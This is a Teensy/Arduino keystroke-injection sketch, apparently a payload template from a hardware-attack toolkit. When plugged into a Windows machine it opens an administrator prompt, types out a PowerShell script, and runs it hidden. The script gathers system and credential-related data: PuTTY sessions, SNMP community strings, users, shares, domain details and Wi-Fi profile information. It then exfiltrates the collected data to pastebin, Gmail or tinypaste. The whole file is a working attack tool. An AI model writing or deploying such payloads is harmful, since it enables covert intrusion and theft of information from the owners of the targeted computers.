#define BOARDTYPE #ifdef TEENSY2 #include #endif void setup(){ delay(3000); wait_for_drivers(2000); minimise_windows(); delay(500); while(!cmd_admin(3,500)) { reset_windows_desktop(2000); } Keyboard.println("echo $pn = $env:COMPUTERNAME + \" Info\" > %temp%\\in.ps1"); Keyboard.println("echo $user = \"INPUT0\" >> %temp%\\in.ps1"); Keyboard.println("echo $pass = \"INPUT1\" >> %temp%\\in.ps1"); Keyboard.println("echo $dev = \"INPUT2\" >> %temp%\\in.ps1"); delay(1000); Keyboard.println("echo function rv($rk, $rg,$ch) >> %temp%\\in.ps1"); Keyboard.println("echo { >> %temp%\\in.ps1"); Keyboard.println("echo if ($ch -eq \"no\"){$key = get-item $rk} >> %temp%\\in.ps1"); Keyboard.println("echo else{$key = ls $rk} >> %temp%\\in.ps1"); Keyboard.println("echo $key ^| >> %temp%\\in.ps1"); Keyboard.println("echo ForEach-Object { >> %temp%\\in.ps1"); Keyboard.println("echo $v = gp $_.PSPath >> %temp%\\in.ps1"); Keyboard.println("echo ForEach ($value in $_.Property) >> %temp%\\in.ps1"); Keyboard.println("echo { >> %temp%\\in.ps1"); Keyboard.println("echo if ($rg -eq \"all\") {$v.$value} >> %temp%\\in.ps1"); Keyboard.println("echo elseif ($rg -eq \"allname\"){$value} >> %temp%\\in.ps1"); Keyboard.println("echo else {$v.$rg;break} >> %temp%\\in.ps1"); Keyboard.println("echo }}} >> %temp%\\in.ps1"); Keyboard.println("echo $o = \"Logged in users:`n\" + (rv \"hklm:\\software\\microsoft\\windows nt\\currentversion\\profilelist\" \"profileimagepath\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n PS Env:`n\" + (rv \"hklm:\\software\\microsoft\\powershell\1\" \"allname\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Putty trusted hosts:`n\" + (rv \"hkcu:\\software\\simontatham\\putty\" \"allname\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Putty saved sessions:`n\" + (rv \"hkcu:\\software\\simontatham\\putty\\sessions\" \"all\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Shares:`n\" + (rv \"hklm:\\SYSTEM\\CurrentControlSet\\services\\LanmanServer\\Shares\" \"all\" \"no\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Env vars:`n\" + (rv \"hklm:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" \"all\" \"no\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Current user:`n\" + (rv \"hkcu:\\Volatile Environment\" \"all\" \"no\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n SNMP cs:`n\" + (rv \"hklm:\\SYSTEM\\CurrentControlSet\\services\\snmp\\parameters\\validcommunities\" \"all\" \"no\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n SNMP cs - user:`n\" + (rv \"hkcu:\\SYSTEM\\CurrentControlSet\\services\\snmp\\parameters\\validcommunities\" \"all\" \"no\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Installed Apps:`n\" + (rv \"hklm:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" \"displayname\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Installed Apps - user:`n\" + (rv \"hkcu:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" \"displayname\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Domain:`n\" + (rv \"hklm:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\\" \"all\" \"no\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Contents of /etc/hosts:`n\" + (gc -path \"C:\\windows\\System32\\drivers\\etc\\hosts\") >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Running Services:`n\" + (net start) >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Account Policy:`n\" + (net accounts) >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Local users:`n\" + (net user) >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n Local Groups:`n\" + (net localgroup) >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o + \"`n WLAN Info:`n\" + (netsh wlan show all) >> %temp%\\in.ps1"); Keyboard.println("echo $o = $o.Replace(\"/\",\"\\\") >> %temp%\\in.ps1"); Keyboard.println("echo $pv = $o.Replace(\"www\",\"uuu\") >> %temp%\\in.ps1"); if ("INPUT3" == "pastebin") { pastebin("in"); } else if ("INPUT3" == "gmail") { gmail("in","no"); } else if ("INPUT3" == "tinypaste") { tinypaste("in"); } Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\in.vbs"); Keyboard.println("echo oShell.Run(\"powershell.exe -ExecutionPolicy Bypass -noLogo -command %temp%\\in.ps1\"),0,true >> %temp%\\in.vbs"); delay(1000); Keyboard.println("wscript %temp%\\in.vbs"); delay(3000); Keyboard.println("exit"); } void loop(){ } DEFS